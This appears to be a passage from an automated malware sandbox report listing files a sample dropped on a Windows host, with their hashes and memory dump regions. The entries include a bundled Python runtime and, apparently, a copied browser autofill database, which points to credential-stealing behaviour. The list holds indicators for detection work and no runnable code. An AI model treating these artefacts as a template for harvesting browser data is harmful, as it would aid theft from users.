SHA512 cf9d54474347d15ad1b8b89b2e58b850ad3595eec54173745bde86f94f75b39634be195a3aef69d71cb709ecff79c572a66b1458a86fa2779f043a83a5d4cc4c

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\site-packages\distutils-precedence.pth

MD5 18d27e199b0d26ef9b718ce7ff5a8927
SHA1 ea9c9bfc82ad47e828f508742d7296e69d2226e4
SHA256 2638ce9e2500e572a5e0de7faed6661eb569d1b696fcba07b0dd223da5f5d224
SHA512 b8504949f3ddf0089164b0296e8371d7dcdd4c3761fb17478994f5e6943966528a45a226eba2d5286b9c799f0eb8c99bd20cbd8603a362532b3a65dd058fa42e

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\site-packages\pywin32.pth

MD5 322bf8d4899fb978d3fac34de1e476bb
SHA1 467808263e26b4349a1faf6177b007967fbc6693
SHA256 4f67ff92af0ea38bf18ac308efd976f781d84e56f579c603ed1e8f0c69a17f8d
SHA512 d7264690d653ac6ed4b3d35bb22b963afc53609a9d14187a4e0027528b618c224ed38e225330ceae2565731a4e694a6146b3214b3dcee75b053c8ae79f24a9dd

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\site-packages\win32\lib\pywin32_bootstrap.py

MD5 5d28a84aa364bcd31fdb5c5213884ef7
SHA1 0874dca2ad64e2c957b0a8fd50588fb6652dd8ee
SHA256 e298ddcfcb0232257fcaa330844845a4e7807c4e2b5bd938929ed1791cd9d192
SHA512 24c1ad9ce1d7e7e3486e8111d8049ef1585cab17b97d29c7a4eb816f7bdf34406aa678f449f8c680b7f8f3f3c8bc164edac95ccb15da654ef9df86c5beb199a5

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\base64.py

MD5 430bef083edc3857987fa9fdfad40a1b
SHA1 53bd3144f2a93454d747a765ac63f14056428a19
SHA256 2bdcb6d9edfd97c91bc8ab325fcc3226c71527aa444adb0a4ed70b60c18c388d
SHA512 7c1b8ea49ba078d051f6f21f99d8e51dc25f790e3daff63f733124fc7cf89417a75a8f4565029b1f2eb17f545250e1087f04ecb064022907d2d59f6430912b3a

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\re.py

MD5 f04d4a880157a5a39bbafc0073b8b222
SHA1 92515b53ee029b88b517c1f2f26f6d022561f9b4
SHA256 5ae8929f8c0fb9a0f31520d0a909e5637d86c6debb7c0b8cbacc710c721f9f7d
SHA512 556aaacfc4237b8ab611922e2052407a6be98a7fb6e36e8d3ed14412b22e50abac617477f53acfa99dba1824b379c86376991739d68749eb5f162e020e7999cb

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\enum.py

MD5 f87cac79ab835bac55991134e9c64a35
SHA1 63d509bf705342a967cdd1af116fe2e18cd9346f
SHA256 303afea74d4a1675a48c6a8d7c4764da68dbef1092dc440e4bf3c901f8155609
SHA512 9a087073e285f0f19ab210eceefb9e2284fffd87c273413e66575491023a8dcb4295b7c25388f1c2e8e16a74d3b3bff13ec725be75dc827541e68364e3a95a6d

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\types.py

MD5 c58c7a4ee7e383be91cd75264d67b13b
SHA1 60914b6f1022249cd5d0cf8caa7adb4dcf34c9ea
SHA256 0d3a1a2f8f0e286ad9eadbb397af0c2dc4bef0c71a7ebe4b51ded9862a301b01
SHA512 9450e434c0d4abb93fa4ca2049626c05f65d4fb796d17ac5e504b8ec086abec00dcdc54319c1097d20e6e1eec82529993482e37a0bf9675328421f1fa073bf04

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\sre_compile.py

MD5 f09eb9e5e797b7b1b4907818fef9b165
SHA1 8f9e2bc760c7a2245cae4628caecdf1ada35f46d
SHA256 cdb9bdcab7a6fa98f45ef47d3745ac86725a89c5baf80771f0451d90058a21d6
SHA512 e71fb7b290bb46aee4237dbf7ff4adc2f4491b1fc1c48bd414f5ce376d818564fd37b6113997a630393d9342179fcb7ce0462d6aad5115e944f8c0ccab1fa503

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\sre_parse.py

MD5 d1af43b8e4f286625a0144373cf0de28
SHA1 7fbd019519c5223d67311e51150595022d95fe86
SHA256 c029a310e36013abc15610ff09a1e31d9fb1a0e4c60293150722c08fc9e7b090
SHA512 75ab3b5a2aad2ac44ab63028982a94bb718aaf6c67f6b59a8edc8c2c49287dd16667923e1889c68404053d61df742864a6e85545bbfb17624a5844bb049767f9

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\sre_constants.py

MD5 bca79743254aa4bc94dace167a8b0871
SHA1 d1da34fbe097f054c773ff8040d2e3852c3d77f1
SHA256 513373cde5987d794dc429f7c71a550fe49e274bf82d0856bec40dca4079dadc
SHA512 1c0ab3ce7b24acd2ffbd39a9d4bf343aa670525465b265a6572bdec2036b1a72aaafe07afe63a21246456427f10be519aeee9fc707cbb0151ac1e180239ad2af

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\functools.py

MD5 e451c9675e4233de278acf700ac7395f
SHA1 1e7d4c5db5fc692540c31e1b4db4679051eb5df8
SHA256 b4698d03b4d366f2b032f5de66b8181ed8e371c0d7d714b7672432e18d80636b
SHA512 4db40159db7427ce05d36aa3a6b05151742e6c122dfbdc679c10dcc667fc999ff1302bb2e2be6f58b895911cf436b27ad78fd64ccf077deb94046667520111b9

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\collections\__init__.py

MD5 4f8c270f0ffe58f5c0bf455403ef3f44
SHA1 8c0de07c711cd9486a3ff0d2fc8a5cd4c13ae01a
SHA256 2e5f3a5a7de17bc2b2e749f0d2a1387de2280a0824856360a041b2ca75e77194
SHA512 418971a91d03756a0b2790286f67135ee386aaa0817932130ddba8b68de601d5e29a3dccef1d965bae22e66606c0a3132d179abec7e9296b715e1aad1e6bdfac

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\keyword.py

MD5 dc5106aabd333f8073ffbf67d63f1dee
SHA1 e203519ccd77f8283e1ea9d069c6e8de110e31d9
SHA256 ebd724ed7e01ce97ecb3a6b296001fa4395bb48161658468855b43cff0e6eebb
SHA512 a2817944d4d2fb9edd2e577fb0d6b93337e1b3f98d31ad157557363146751c4b23174d69c35ee5d292845dedcd5ef32eeac52b877d96eb108c819415d5cf300e

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\operator.py

MD5 5ce128b0b666d733f0be7dff2da87f7c
SHA1 b73f3ea48ada4eca01fbed4a2d22076ad03c1f74
SHA256 4b14013b84ffe4be36fc3a4b847006ba1182596612d2a2ab42a6e94ff990b462
SHA512 557557f4bf9a6f238340596aa84f079318f96c44e26804a3083a6359c36bdb6cef5d5a2d5a698202d36bf6b9c7d0d7625b4e2b72b0a4582a78569e104f9f755a

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\reprlib.py

MD5 e7c51384148475bffeb9729df4b33b69
SHA1 58109e3ae253b6f9bf94bd8a2c880beae0eddf94
SHA256 3be6cde6103319b3ca44bbc4d40c60e0bcb14a53e93e2578e8e4e850f4a8c66b
SHA512 a7c81fd784e537da08a8ead5a6c635b66123de815b73fae2b9f1662cf49af4c9e41e648075cc0ee2a64c034fa38da4a4e90163e9b955b17d20490eeb86004341

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\copyreg.py

MD5 5b6ba7867d653890af7572cc0aaab479
SHA1 6877d39632885002917342df18e83bebd42339ea
SHA256 e5bf33a527d7251f17bfd491ad0f0858e1a3c4c7c10dc5e578fdb6c80c8f9336
SHA512 841389a1c64f9384f17f78c929d4161b42ce3389f6ac47666cf1b3ccfef77f2033ebc86087cb2878bee336623fc1fad772f3cd751a57e3797ce0807d75e115bd

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\struct.py

MD5 5b6fab07ba094054e76c7926315c12db
SHA1 74c5b714160559e571a11ea74feb520b38231bc9
SHA256 eadbcc540c3b6496e52449e712eca3694e31e1d935af0f1e26cff0e3cc370945
SHA512 2846e8c449479b1c64d39117019609e5a6ea8030220cac7b5ec6b4090c9aa7156ed5fcd5e54d7175a461cd0d58ba1655757049b0bce404800ba70a2f1e12f78c

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\urllib\request.py

MD5 afe01e917ce572825da95e2f73c3a182
SHA1 b594e4df01e500977fce80a72d5d394eb88936f2
SHA256 a07af23f83f01c5567676bde1e4cd9fa58161b1d2bbce00db630ae881a011416
SHA512 e54f110c9232b72ee23c7b3b35d8fb09b6223372eef98f7b82092f8912379734f45ccc01dde6822d2c302e9eac7e36b0a15a65ba62b1674262184c462ef414f6

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\bisect.py

MD5 83e7f736e1877af35cf077675de88849
SHA1 f4ec527f0164ca35653c546d20d78680e359aada
SHA256 05d6b239ee3d6114a682aa9a5efb8f8b315cce6fc2a5d6f1147192ab5a044f44
SHA512 a511f888a7be2d58846f9df8694699638797151ea992a954f982761102ba8c6db5794f4ccfa3c8f36c997ff349c2ec3482e0353a71d4564958c12bfd2093ddad

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\email\__init__.py

MD5 4a5beb56533bf0d8b94ee640f866e491
SHA1 44497180de35656486799bc533de4eaaf3c3ee2c
SHA256 af3dd99d5c82fa7e75a653b813a592a92cf453ebc4226fb330cd47e560395426
SHA512 06d65e564e593489f4d49d8eab35936b829913db1898b25aec2532c42bcbe1a1450248f98972119349dc1fd17337ab48f9b4749075195e763abdfd8f430a4af2

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\hashlib.py

MD5 21dd74815051864f290794402768f3b9
SHA1 a5d1e78b5c9172fe184d6b32b67848164edebb34
SHA256 4f2cd247217f809905c3d7a3178eae31d697c33ca42f06e9d2217df86d4832a8
SHA512 194464d2309dadbbb2ccb8217765f727be9e86914eb67ecea89332baa8629a9e0c40a7707ddeb7db768a2fc85ded20ef8d74fe03cdd78998b29ef374e9d74953

C:\Users\Admin\AppData\Local\x1FWfQj3f9\DLLs\_hashlib.pyd

MD5 2ac2dee9fdb32be30fefd4fdb5d280b3
SHA1 5e803c5d649521cab34bfc7ef6dc44954915220d
SHA256 f10c90062eaa68f41b1a6b34f3796e3ab8e0d765e595236e893cff9fad30116a
SHA512 86a7dfe6f15fce67accbc84262c73d25f2e440b7529143235b9b32f15f7804f99206e24c5ed8e5219bb5895bf6e397304ba153e064ff97eed23f5e92469e901e

C:\Users\Admin\AppData\Local\x1FWfQj3f9\DLLs\libcrypto-1_1.dll

MD5 4633d62f19c0b25318b1c612995f5c21
SHA1 50601f9e2b07d616fde8ee387ce8cdcb0ca451df
SHA256 47376d247ae6033bc30fee4e52043d3762c1c0c177e3ec27ca46eff4b95c69b0
SHA512 d6a18e43b1a20242f80265054ed8d33598439ffa5df4920931ff43ec91f1ac2d8a3931913fd5569f48c9b1b9ea845d9e017ea23571a1ac1b352502a3e823eca9

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\http\__init__.py

MD5 26b5cf5f93fa25440187796db6ccce16
SHA1 7547272bdfa0bc9a9387cde17fc5972b548e2593
SHA256 6297da88ab77cced08a3c622c51292851cc95b8175b7342b4cd7f86595f73158
SHA512 bd5737bfce668b6f1513a00010c8a33e6d2841c709b4dfe86da1a7ee51c78c27ab61daba6e1f2599432ea4224d6e488f61f464af385f5180a7f55ec9142d4f1a

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\http\client.py

MD5 5d6bfc608ecf70840d6de2795fd69f1f
SHA1 17f160f07b156f498d251e189408cbfc5730ea86
SHA256 1e627d49863719fe81eec9ec3ce3a11263e24848f7f9a0dc01df515971e6acf5
SHA512 ab562c2cb8243109f74c44ad157ea470181581114d42907f76b89b65b7caad745b6c0ef39f91aaa02146f1e67c68a244fffdc0b00e83405a34060e4f84dd0655

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\email\parser.py

MD5 733c13463be8e3e9ff0f7f9580f81890
SHA1 fb513e85f27dac34ae6d6233a48d118a04c5725b
SHA256 2a4247867376b64ee4fd66952f348305aa74ebb5484bc247e0c1d6ad63781b8e
SHA512 d3468f37667a47b3601be4dcb6e7ffc0749a0d0a7673f93073c23d713854b043f0927819d4028efff6cb58e16074ac437406b52c625d1e2fd1e00aaef380caca

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\email\feedparser.py

MD5 2d2b32601ad79a67484175ec19c73c77
SHA1 1b31d6bb28ca6939f4f4b6aa662a1254dea9f157
SHA256 f3b126e9c8e58230b0d9295b69b4940569eb003afcba80ba1714ca5e53f84886
SHA512 91c830d6d96dfd152e1e6e4d44cafb9c5eef1fda482a450093143b177b902e7659153ce877695f005862f106bc0ed353a17a2ca8872087dce6ac86143a5a6d47

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\email\errors.py

MD5 8a6ee2e875d87833b092c4ffb1486680
SHA1 3a1c424674cada0fc0182617b0df008633e237b1
SHA256 ac186c29f471f55de3099f82b67b8b0b9edb16e4568cb094f852373a0485d07a
SHA512 4d82e81c20edfeb60411e4be994c1c3f5ea92c9abbbf43f3ad344852586d53c744bddb9ae09f381e139e670ec7d97bf7859f5101f8c2da57a9e730451409d15e

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\email\_policybase.py

MD5 0c5b89a975bb78a09f8601501ddbf037
SHA1 949b4a68b8a9dfd7c3a4e9e04dd6c9f0dbb6d76b
SHA256 d9f2e3a5e277cfe874e4c47bf643497c51d3b8c4b97124b478da23407921daec
SHA512 ea3e1e795470acf89d61cb31a67afd7055a3c48204371a9f62b0dadb8ff15f7b771f159de123f53d939437b1374ba4437d945b6990a5afaa93b5da54154da83b

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\email\header.py

MD5 efe826ee4e05118b050e04fd44da04e1
SHA1 74708eca64365eeaf6f0db3af06470a3136971bf
SHA256 8989b40d16a74e408f117ac964f0498ac807430fb16e1b41fc3783c8397ae165
SHA512 d505b167e8bb9d6f3250cbe4019e11952f004ab6e1691c952f1b0d7a014a2bb84316849ec4413a87ec2fd6f64ff24ee144d9dcb9a70d7e8fe5c4e19af5847c7f

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\email\quoprimime.py

MD5 91e0134c7993b62df821299cbfe9cf20
SHA1 3e647d829457fc8e76b5d36ed31aff8f383b004f
SHA256 0ac88715c424e80122e3d861bbacc20ee289562f2c685aefe40b88471515a1bd
SHA512 dcc68ced12bc04dc7643fe0b636af764d7136ed203eb1e74e2b669ed6349e62f5fb6022cc86dc03b4824dfb1e8ef5d59ee648dc9d015a0a44641b6cd01eb22d4

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\string.py

MD5 cb7c76d92fe77fceb57279a18afdb96e
SHA1 bc102311785e8912afde553cad6c54a92ea68051
SHA256 34b846ae1458673b9a9026e6300ff0947dd1b3dc374bdd1d126518d8d1a528b2
SHA512 7785afaea59cc3f86f590923c1416832c8aadccb67a589074b8811ba1260257abf3e8d5bf386f9296e4c31d8e69c2886d411d313eb2e4bcdcde794c83a4c3480

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\email\base64mime.py

MD5 8ae63186399520ccd61e4776409065ff
SHA1 bf485e3b3051eac063e9c69161a542d5072759c9
SHA256 7e499fdefaf71ca3df0cbeb0b3f7b460fdb3cc86ce82ceb5842747dd1687424d
SHA512 51c83054ec515cc2cc1eb467e3afba92820b3f1cb8c4c22345eda38b23db74c6ff6290bcdf8e77eeadcca2183575d70ea5c88962e3b673ac5cec17e595022dc3

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\email\charset.py

MD5 7d16c9ad3426cd9a469e85b63cd9bf58
SHA1 11db7ca4fc1191e3ee6053b28bdef7c086d5efb6
SHA256 bcf952e8bca0ab984ae06e5d1c8634c7ffff8bd1f02403be3e870325f056d84d
SHA512 ead30dc1068645991516076445c811263a18d033e6dbbf0e1903d0da5192dc4bb0c975d44d1694e91a380a48f5ecffde0483b88a27939467251456f88e9d6282

C:\Users\Admin\AppData\Local\x1FWfQj3f9\lib\email\encoders.py

MD5 c5d9853a25ff74dbd71a79494e777276
SHA1 d31b520808c02b931f2f2ec2dc8fbccd11c350d2
SHA256 1cea37bb71b7aac3c7acb98cccc2f17017f7195ffe510a96f0dacaaba856a2c6
SHA512 4249f3889e4b6d944b5a0e1274076313ddf48f89705f2d91b3625a6e59e3a5be1101c83619aa0dd2b27931f77ccd1fc81aba7f3c3fb3b5b215a4c1e5f0f365f2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\autofill_db

MD5 d0150bee5e917cfd7a7152d6c1988919
SHA1 fbcb54efb2fc75f72eaea9605b1a2cae557a121b
SHA256 ea86bc11680540f71d4740429e19804ad5c375e5ceee098981f6aebe691b71c1
SHA512 a3c542917de3538c0a10445f3fd96395cac0f2c572fccc948ed755864d5800af16957d7deb5973a469cde52582d3e3ee6f4d3e87acd7b1084d64441268b2504d

C:\Users\Admin\AppData\Local\Temp\autofill_db

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

memory/3408-3705-0x0000000005180000-0x0000000005194000-memory.dmp

memory/3408-3706-0x0000000005680000-0x0000000005692000-memory.dmp

memory/3408-3707-0x0000000005C20000-0x0000000005CBC000-memory.dmp

memory/3408-3708-0x0000000009690000-0x0000000009C34000-memory.dmp

memory/3408-3709-0x0000000005D30000-0x0000000005D96000-memory.dmp

memory/3408-3710-0x0000000009180000-0x0000000009212000-memory.dmp

memory/3408-3711-0x0000000005D20000-0x0000000005D2A000-memory.dmp